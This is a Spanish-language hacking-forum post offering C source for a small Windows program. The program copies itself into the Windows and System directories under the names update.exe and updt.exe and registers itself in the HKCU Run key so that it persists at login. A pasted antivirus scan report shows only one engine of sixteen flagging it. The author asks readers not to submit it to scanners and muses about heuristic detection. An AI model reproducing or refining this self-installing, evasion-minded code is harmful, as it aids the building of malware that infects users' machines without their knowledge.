Ahy les dejo el codigo en C,recuerden, no es malicioso,peor no lo pasen que esta feo...
Código: Seleccionar todo
#include <stdio.h>
#include <string.h>
#include <windows.h>
char WinDirec[260];
char SysDirec[260];
HKEY poison;
////////////////Agradecimientos a ps1c0s1s/////////////////////////
/////////////// c0d3d p0is0n-123//////////////////////////////////
int main(int argc, char *argv[])
{
GetWindowsDirectory(WinDirec,260);
strcat(WinDirec,"\\update.exe");
CopyFile(argv[0],WinDirec,FALSE);
RegOpenKey("HKEY_CURRENT_USER","Software\\Microsoft\\Windows\\CurrentVersion\\Run",&poison);
RegSetValue(poison,"CSECTION",0,WinDirec,0);
RegCloseKey(poison);
GetSystemDirectory(SysDirec,sizeof(SysDirec));
strcat(SysDirec,"\\updt.exe");
CopyFile(argv[0],SysDirec,FALSE);
}Report date: 2010-09-01 15:08:31 (GMT 1)
File name: virusprueba-exe
File size: 22720 bytes
MD5 Hash: dddd65390b935cfce77c20c253d94fb0
SHA1 Hash: 1eb9f7338c2022a9268be300d2125d36d64b77fe
Detection rate: 1 on 16 (6%)
Status: INFECTED
Detections
a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/Oficla.F.gen!Eldorado
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -
Scan report generated by
[Enlace externo eliminado para invitados]
DP: Esa Mancha de F-PROT me da jordera ver en donde esta,pero de seguro salata por heuristica al ver el registro y el Copy....
Salu2
